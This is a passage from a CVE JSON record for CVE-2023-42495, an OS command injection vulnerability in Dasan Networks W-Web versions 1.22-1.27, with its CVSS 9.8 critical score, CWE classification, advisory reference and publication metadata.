"value": "\n\n\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eDasan Networks - W-Web versions 1.22-1.27 - CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)\u003c/span\u003e\n\n"
}
],
"value": "\nDasan Networks - W-Web versions 1.22-1.27 - CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)\n\n"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78 Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-12-13T12:48:41.608Z",
"orgId": "a57ee1ae-c9c1-4f40-aa7b-cf10760fde3f",
"shortName": "INCD"
},
"references": [
{
"url": "https://www.gov.il/en/Departments/faq/cve_advisories"
}
],
"source": {
"advisory": "ILVN-2023-0146",
"discovery": "UNKNOWN"
},
"title": "\t Dasan Networks - W-Web versions 1.22-1.27 - CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "a57ee1ae-c9c1-4f40-aa7b-cf10760fde3f",
"assignerShortName": "INCD",
"cveId": "CVE-2023-42495",
"datePublished": "2023-12-13T12:48:41.608Z",
"dateReserved": "2023-09-11T07:58:19.184Z",
"dateUpdated": "2024-08-02T19:23:39.667Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}